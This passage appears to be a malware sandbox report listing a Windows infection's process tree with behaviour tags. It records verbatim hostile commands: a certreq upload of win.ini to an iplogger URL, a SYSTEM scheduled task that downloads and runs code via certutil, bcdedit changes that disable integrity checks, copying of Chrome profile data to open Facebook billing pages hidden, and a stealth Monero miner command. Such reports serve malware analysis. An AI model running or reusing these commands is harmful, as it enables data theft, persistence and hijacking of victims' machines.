        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:4588
        
        C:\Program Files (x86)\JCleaner\whiterauf.exe
        
        "C:\Program Files (x86)\JCleaner\whiterauf.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4896
        
        C:\Program Files (x86)\JCleaner\whiterauf.exe
        
        "{path}"
        11⤵
        
        PID:1084
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "C:\Program Files (x86)\JCleaner\Venita.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4888
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "{path}"
        11⤵
        Executes dropped EXE
        
        PID:4208
        
        C:\Program Files (x86)\JCleaner\Abbas.exe
        
        "C:\Program Files (x86)\JCleaner\Abbas.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
        10⤵
        Blocklisted process makes network request
        Drops file in System32 directory
        
        PID:4872
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1aSny7"
        10⤵
        
        PID:4860
        
        C:\Program Files (x86)\JCleaner\5.exe
        
        "C:\Program Files (x86)\JCleaner\5.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4816
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
        11⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        12⤵
        Delays execution with timeout.exe
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\na2t0znye1d\vk0o3uwmyy2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\na2t0znye1d\vk0o3uwmyy2.exe" 57a764d042bf8
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:4536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\KLB8YAHJ87\KLB8YAHJ8.exe" 57a764d042bf8 & exit
        9⤵
        
        PID:5884
        
        C:\Program Files\KLB8YAHJ87\KLB8YAHJ8.exe
        
        "C:\Program Files\KLB8YAHJ87\KLB8YAHJ8.exe" 57a764d042bf8
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:5972
        
        C:\Users\Admin\AppData\Local\Temp\4mgec2ac2w2\0keqm0bnzoc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4mgec2ac2w2\0keqm0bnzoc.exe" testparams
        8⤵
        Executes dropped EXE
        
        PID:4524
        
        C:\Users\Admin\AppData\Roaming\503sz0yovgg\5wnugjhjeyk.exe
        
        "C:\Users\Admin\AppData\Roaming\503sz0yovgg\5wnugjhjeyk.exe" /VERYSILENT /p=testparams
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\is-PUDAC.tmp\5wnugjhjeyk.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PUDAC.tmp\5wnugjhjeyk.tmp" /SL5="$203C6,329392,58368,C:\Users\Admin\AppData\Roaming\503sz0yovgg\5wnugjhjeyk.exe" /VERYSILENT /p=testparams
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:5928
        
        C:\Users\Admin\AppData\Local\Temp\4ty4lonesdd\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4ty4lonesdd\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\is-LUAKG.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LUAKG.tmp\vpn.tmp" /SL5="$2030E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4ty4lonesdd\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5740
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:4528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5392
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        
        PID:4136
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:4220
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\1fwxrgyryn0\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1fwxrgyryn0\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\yitgvtrtuqo\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yitgvtrtuqo\app.exe" /8-23
        8⤵
        Executes dropped EXE
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\yitgvtrtuqo\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yitgvtrtuqo\app.exe" /8-23
        9⤵
        
        PID:4592
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        10⤵
        
        PID:2824
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        11⤵
        
        PID:5324
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-23
        10⤵
        
        PID:5608
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        11⤵
        Creates scheduled task(s)
        
        PID:6092
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        11⤵
        Creates scheduled task(s)
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        11⤵
        
        PID:2180
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5056
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5808
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5100
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5196
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4144
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5504
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5804
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4280
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:1048
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6220
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6304
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6356
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6412
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6460
        
        C:\Windows\System32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        11⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        11⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        11⤵
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
        12⤵
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        11⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
        12⤵
        
        PID:7636
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        11⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"
        12⤵
        
        PID:7528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=3636af7a-4407-4ef9-a438-0ed2bf80a9a9&browser=chrome
        13⤵
        
        PID:8076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffaea4e6e00,0x7ffaea4e6e10,0x7ffaea4e6e20
        14⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        11⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        11⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
        11⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\qy24pdg2oai\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qy24pdg2oai\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\is-IBHPK.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IBHPK.tmp\IBInstaller_97039.tmp" /SL5="$1041A,14437942,721408,C:\Users\Admin\AppData\Local\Temp\qy24pdg2oai\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\is-M0KKL.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-M0KKL.tmp\{app}\chrome_proxy.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4352
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        10⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\flkjpf2oxxu\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\flkjpf2oxxu\safebits.exe" /S /pubid=1 /subid=451
        8⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\hy3yr2yboka\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hy3yr2yboka\askinstall24.exe"
        8⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:7240
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:4256
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
        9⤵
        
        PID:6452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        9⤵
        
        PID:8884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaebfa6e00,0x7ffaebfa6e10,0x7ffaebfa6e20
        10⤵
        
        PID:8900
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1940 /prefetch:8
        10⤵
        
        PID:9092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1648 /prefetch:2
        10⤵
        
        PID:9084
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1952 /prefetch:8
        10⤵
        
        PID:9100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:1
        10⤵
        
        PID:8216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
        10⤵
        
        PID:9212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
        10⤵
        
        PID:8204
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
        10⤵
        
        PID:6180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
        10⤵
        
        PID:6216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
        10⤵
        
        PID:4640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=3564 /prefetch:8
        10⤵
        
        PID:7060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=3816 /prefetch:8
        10⤵
        
        PID:6400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5140 /prefetch:8
        10⤵
        
        PID:7788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2408 /prefetch:8
        10⤵
        
        PID:4884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,8774339175430730085,6296994736822548775,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5128 /prefetch:2
        10⤵
        
        PID:6400
        
        C:\Users\Admin\AppData\Local\Temp\r1wvcqrinxf\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\r1wvcqrinxf\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\is-HU2NG.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HU2NG.tmp\vict.tmp" /SL5="$803F0,870426,780800,C:\Users\Admin\AppData\Local\Temp\r1wvcqrinxf\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:6856
        
        C:\Users\Admin\AppData\Local\Temp\is-4JLAB.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-4JLAB.tmp\wimapi.exe" 535
        10⤵
        
        PID:5180
        
        C:\Users\Admin\AppData\Local\Temp\vq5rmynajo5\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vq5rmynajo5\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:6784
        
        C:\Users\Admin\AppData\Local\Temp\is-KIOI0.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KIOI0.tmp\Setup3310.tmp" /SL5="$B027A,802346,56832,C:\Users\Admin\AppData\Local\Temp\vq5rmynajo5\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\is-STS48.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-STS48.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\is-HRBRI.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HRBRI.tmp\Setup.tmp" /SL5="$5033C,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-STS48.tmp\Setup.exe" /Verysilent
        11⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\ProPlugin.exe" /Verysilent
        12⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Local\Temp\is-164MB.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-164MB.tmp\ProPlugin.tmp" /SL5="$50344,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\ProPlugin.exe" /Verysilent
        13⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\is-UBH5O.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UBH5O.tmp\Setup.exe"
        14⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
        15⤵
        
        PID:8844
        
        C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\DataFinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\DataFinder.exe" /Verysilent
        12⤵
        
        PID:4656
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth
        13⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\Delta.exe" /Verysilent
        12⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\is-IGU3H.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IGU3H.tmp\Delta.tmp" /SL5="$50506,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\Delta.exe" /Verysilent
        13⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Local\Temp\is-GIJB3.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GIJB3.tmp\Setup.exe" /VERYSILENT
        14⤵
        
        PID:7484
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1008
        15⤵
        Program crash
        
        PID:3232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1012
        15⤵
        Program crash
        
        PID:9164
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1092
        15⤵
        Program crash
        
        PID:4928
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1140
        15⤵
        Program crash
        
        PID:528
        
        C:\Windows\SysWOW64\WerFault.exe
        
